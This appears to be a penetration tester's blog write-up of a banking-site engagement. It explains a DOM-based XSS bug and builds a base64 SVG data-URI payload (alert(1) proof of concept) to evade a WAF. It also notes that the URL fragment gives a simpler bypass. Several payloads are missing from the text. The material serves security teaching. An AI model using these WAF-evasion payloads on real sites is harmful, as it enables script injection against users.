When you are performing a pen test or participating in a bug bounty program, you are sometimes confronted by a Web Application Firewall (WAF) designed to block malicious payloads. To properly identify and exploit a Cross-site Scripting (XSS) vulnerability you will need to find a way around it! This article demonstrates a method of creating an SVG-based payload to bypass those pesky WAFs.
UPDATE 01/11/2014 : Slides from Ruxcon 2014 turbotalk can be found here
All the images below are from a replica site I made for testing and demonstration purposes. Real images could not be used due to confidentiality. However the descriptions are all based on the actual engagement.
Securus Global was tasked with performing a penetration test for a company in the banking sector on their production web application. As part of the scope we were given several forms that customers could use to apply for credit cards or request bank loans. The forms prompted you to enter your personal information, which was checked for validity client side and then sent to the server for processing by a staff member. The immediate response to a successful application was a "thank you for applying" page that allowed you to download your application and gave you a reference number for it.
When testing in a production environment that deals with real customer information, features such as money transfers and the threat of downtime, several differences in methodology have to be considered before testing commences:
Normally, automated spidering tools like the ones you will find in Burp Proxy or ZAP are used to aid the initial information gathering process. However, if used carelessly, these tools can cause serious problems in a production environment.
Blindly spidering a website can be dangerous because the web application may have sensitive features that should not be executed on a production system holding real users' data. As an extreme example, there may be a feature that deletes a user's account from the system, along with all their data. The forms were relatively simple and did not involve many pages, so we opted to spider the site manually to reduce the risk of performing an action that could damage user data.
Another benefit of manually spidering a site is that you are likely to find pages that a spider will not. A good example is when a spider reaches a form that requires user input but can't progress past it because it keeps entering invalid data. Sometimes the input is straightforward text, such as a first name with little validation, but other inputs can be very particular. The forms provided had very specific data inputs that were heavily validated client side before the form was submitted and we were directed to the next page. Examples included a mobile number starting with a 7 and a credit card number that had to match the company's BIN number.
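Card number fields like this are typically validated client side with a Luhn checksum, so valid-looking test data matching a given BIN can be generated rather than guessed. A hypothetical helper (not from the engagement) might look like this:

```javascript
// Return the check digit that makes `partial` + digit Luhn-valid.
function luhnCheckDigit(partial) {
  let total = 0;
  const digits = partial.split("").reverse();
  for (let i = 0; i < digits.length; i++) {
    let d = Number(digits[i]);
    if (i % 2 === 0) {   // these positions are doubled once the check
      d *= 2;            // digit is appended on the right
      if (d > 9) d -= 9;
    }
    total += d;
  }
  return String((10 - (total % 10)) % 10);
}

// Build a Luhn-valid test number starting with `binPrefix`.
function testCardNumber(binPrefix, length = 16) {
  const body = binPrefix.padEnd(length - 1, "0"); // deterministic padding
  return body + luhnCheckDigit(body);
}

console.log(testCardNumber("400000")); // "4000000000000002"
```

Feeding numbers like this through the form lets you reach the pages behind it without tripping the client-side checks.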
Just like automated spidering, active vulnerability scanning carries the same business risks mentioned above; however, scanning also adds risk in other areas, such as denial of service (DoS). If a scanner is blindly sending requests designed to exploit any potential vulnerability, it is common for web servers to crash or hang, preventing real users from using the service. Some scanners actually test specifically for DoS vulnerabilities, with the aim of bringing down the web server any way they can.
Initial discussions with the client made it clear that bringing the website down was definitely out of the question, so we opted to stick with manual vulnerability testing, using automated tools only to fuzz a few selected inputs. It must be noted that any testing, whether manual or automated, always carries some possibility of causing a DoS of the web server; however, anything you can do to minimize the risk of a production server going down is worth doing.
The presence of a web application firewall (WAF) sitting between you and the server can also make automated tools fail. Depending on the type of WAF, it can block common payloads and/or sanitize inputs before they even reach the web server. Rate limiting is also a common feature, which will slow down the number of requests coming from one IP address or block that address from making further requests entirely. The engagement was a blackbox test and we had no information about the back end server infrastructure; however, from our manual testing we strongly suspected a WAF or intrusion detection system (IDS) was in place. Yet another reason manual testing was needed for this engagement.
After manually submitting the form using the fake but valid data acquired earlier, I received a "thanks for applying" page as shown below. None of the form's inputs were reflected back from the server, so at this point it looked like an XSS bug was out of the question.
Simplified snippet of the source code:
Going through the code we notice several interesting aspects:
Line 5: The website is using a jQuery plugin called query to extract the URL parameters. Under the covers it calls location.search and location.hash and performs no encoding or sanitization of the parsed URL parameters. When used in conjunction with the jQuery append function mentioned below, this can lead to DOM based XSS vulnerabilities.
Line 15: The jQuery append function is given user-supplied data (the parsed URL parameters from the query library), which jQuery itself warns can introduce XSS vulnerabilities, especially when no escaping or sanitization is performed beforehand:
“Do not use these methods to insert strings obtained from untrusted sources such as URL query parameters, cookies, or form inputs. Doing so can introduce cross-site-scripting (XSS) vulnerabilities. Remove or escape any user input before adding content to the document.”
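The vulnerable pattern that warning describes can be sketched as follows. This is a hypothetical reconstruction, not the site's actual code: a naive parser, like the query plugin, hands back raw, unescaped values from location.search or location.hash.

```javascript
// Naive query-string parser: returns raw, decoded parameter values
// with no escaping (illustrative reconstruction of the query plugin).
function parseQuery(search) {
  const params = {};
  for (const pair of search.replace(/^[?#]/, "").split("&")) {
    const idx = pair.indexOf("=");
    if (idx === -1) continue;
    params[pair.slice(0, idx)] = decodeURIComponent(pair.slice(idx + 1));
  }
  return params;
}

// Simulating ?refid=%3Cu%3E1234%3C%2Fu%3E -- the markup survives intact.
const params = parseQuery("?refid=%3Cu%3E1234%3C%2Fu%3E");
console.log(params.refid); // "<u>1234</u>"

// The page then did the equivalent of:
//   $("#ref").append("Your reference: " + params.refid);
// append() parses that string as HTML, so any injected tags (and their
// event handlers, absent a WAF) execute in the victim's DOM.
```

The key point is that nothing between the URL bar and the DOM ever escapes the attacker-controlled value.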
DOM based XSS
If user input is accessed and used to manipulate the DOM in any way without sanitization first being applied, this can lead to a DOM based XSS vulnerability.
The other major difference is that some DOM based XSS attacks don't need to go through the server to be exploitable. This can happen when using the hash (#) part of a URL, called the fragment. Any parameters after the hash are not sent to the server in an HTTP request. For a detailed explanation of DOM based XSS with some basic examples, this article written in 2005 by Amit Klein is a good place to start.
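The split can be seen with the standard URL API (available in modern browsers and Node; the URL itself is illustrative):

```javascript
// Query string vs. fragment: only one of them reaches the server.
const url = new URL("https://example.com/thanks?refid=1234#fragment-data");

console.log(url.search); // "?refid=1234"    -> part of the HTTP request
console.log(url.hash);   // "#fragment-data" -> never transmitted; only
                         //    client-side code (location.hash) sees it
```

Anything placed after the # is therefore invisible to server-side filters and logs, which matters later in this article.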
Having read the code and understood how the page parses and uses the URL parameters, it was time to start testing some basic payloads. But first the location of our payload should be identified from the URL below:
To verify that this parameter is indeed vulnerable we can write something like this:
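(The original payload image did not survive extraction; it was presumably along these lines, wrapping the reflected value in a `<u>` tag — the URL and reference number are illustrative:)

```
https://example.com/thanks.html?refid=<u>1234</u>
```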
This should make the reference ID underlined.
The underlined refid demonstrates that the server does either minimal filtering or no filtering of URL parameters.
After trying several other, more complex payloads, nothing seemed to work. A WAF appeared to be filtering certain expressions. Some examples of the strings it was filtering were:
- All event handlers such as
- The data attribute
- And many more
More research was necessary to come up with a payload that would bypass the WAF's filter. The answer turned out to be the data URI.
“Used to embed small items of data into a URL—rather than link to an external resource, the URL contains the actual encoded data. Data URIs are supported by most modern browsers except for some versions of Internet Explorer.”
Where the base64 encoded part is:
Unfortunately the object tag and data attribute are also included in the WAF's filtering, so this payload failed too.
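For reference, a data URI like the ones above can be built in a few lines. The SVG body here is an illustrative stand-in, not the engagement's payload (Node shown; in a browser you would use btoa instead of Buffer):

```javascript
// Build a base64 data URI for an (illustrative) SVG document.
const svg =
  '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>';
const encoded = Buffer.from(svg, "utf8").toString("base64");
const dataUri = `data:image/svg+xml;base64,${encoded}`;

console.log(dataUri); // data:image/svg+xml;base64,PHN2ZyB4bWxucz0i...
```

Because the markup is base64 encoded, strings like `<script>` never appear literally in the URL, which is exactly what makes this shape interesting against a string-matching WAF.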
Where the encoded part is:
The Final Payload
Base64 encoded data URI:
Payload executing the alert:
SVG Payload Explained
Stepping through the payload, notice it's embedding an SVG into another SVG utilizing the <use> tag and data URI concept mentioned earlier. The <use> tag is one of only a handful of acceptable tags that you can use when constructing an SVG image with the <svg> tag. Below are the tags that can be used:

The <use> tag has an attribute called xlink:href which links to another file; in this case it is linking to an inline SVG. The #rectangle at the end of the base64 encoded string specifies the ID of the element within the data URI that we are linking to.
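A minimal reconstruction of that structure looks something like the following. The rectangle element, its id, and the `<BASE64_OF_INNER_SVG>` placeholder are illustrative; the placeholder stands in for the base64 encoding of the inner document:

```html
<!-- Inner SVG: base64 encoded and placed inside the data URI below -->
<svg id="rectangle" xmlns="http://www.w3.org/2000/svg">
  <rect width="100" height="100" />
</svg>

<!-- Outer SVG: <use> pulls in the element with id="rectangle" -->
<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <use xlink:href="data:image/svg+xml;base64,<BASE64_OF_INNER_SVG>#rectangle" />
</svg>
```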
The <embed> tag was chosen.
The Easier Way
After all the hard work of bypassing the WAF to successfully exploit the XSS vulnerability, and the hours of research that went into creating a complex payload, it turned out to be completely unnecessary: a much simpler approach was possible.
The URL fragment identifier was the key to this simpler technique. It is more commonly known as the hashbang (#!) in modern single-page web apps, where it is used, amongst other things, to save the state of a web application so users can bookmark a page and come back to where they left off. The difference between the query string (anything after the question mark (?)) and the fragment identifier is that anything after the hash is not sent to the server in the HTTP request.